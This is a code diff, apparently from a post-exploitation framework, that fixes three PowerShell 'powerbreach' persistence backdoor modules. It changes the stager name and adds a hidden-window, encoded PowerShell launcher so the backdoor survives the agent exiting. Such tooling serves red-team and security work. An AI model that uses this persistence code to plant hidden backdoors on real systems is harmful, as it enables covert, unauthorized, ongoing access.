Fix powerbreach modules

lib/modules/powershell/persistence/powerbreach/deaduser.py

@@ -149,7 +149,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
 
         else:
             # set the listener value for the launcher
-            stager = self.mainMenu.stagers.stagers["launcher"]
+            stager = self.mainMenu.stagers.stagers["multi/launcher"]
             stager.options['Listener']['Value'] = listenerName
             stager.options['Base64']['Value'] = "False"
 
@@ -188,7 +188,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
             script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
         # transform the backdoor into something launched by powershell.exe
         # so it survives the agent exiting  
-        launcher = helpers.powershell_launcher(script) 
+        modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+        launcher = helpers.powershell_launcher(script, modifiable_launcher) 
         stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
         parts = stagerCode.split(" ")
 

lib/modules/powershell/persistence/powerbreach/eventlog.py

@@ -1,5 +1,6 @@
 import os
 from lib.common import helpers
+import pdb
 
 class Module:
 
@@ -123,7 +124,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
 
         else:
             # set the listener value for the launcher
-            stager = self.mainMenu.stagers.stagers["launcher"]
+            stager = self.mainMenu.stagers.stagers["multi/launcher"]
             stager.options['Listener']['Value'] = listenerName
             stager.options['Base64']['Value'] = "False"
 
@@ -162,7 +163,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
             script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
         # transform the backdoor into something launched by powershell.exe
         # so it survives the agent exiting  
-        launcher = helpers.powershell_launcher(script) 
+        modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+        launcher = helpers.powershell_launcher(script, modifiable_launcher) 
         stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
         parts = stagerCode.split(" ")
 

lib/modules/powershell/persistence/powerbreach/resolver.py

@@ -136,7 +136,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
 
         else:
             # set the listener value for the launcher
-            stager = self.mainMenu.stagers.stagers["launcher"]
+            stager = self.mainMenu.stagers.stagers["multi/launcher"]
             stager.options['Listener']['Value'] = listenerName
             stager.options['Base64']['Value'] = "False"
 
@@ -175,7 +175,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
             script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
         # transform the backdoor into something launched by powershell.exe
         # so it survives the agent exiting  
-        launcher = helpers.powershell_launcher(script) 
+        modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+        launcher = helpers.powershell_launcher(script, modifiable_launcher) 
         stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
         parts = stagerCode.split(" ")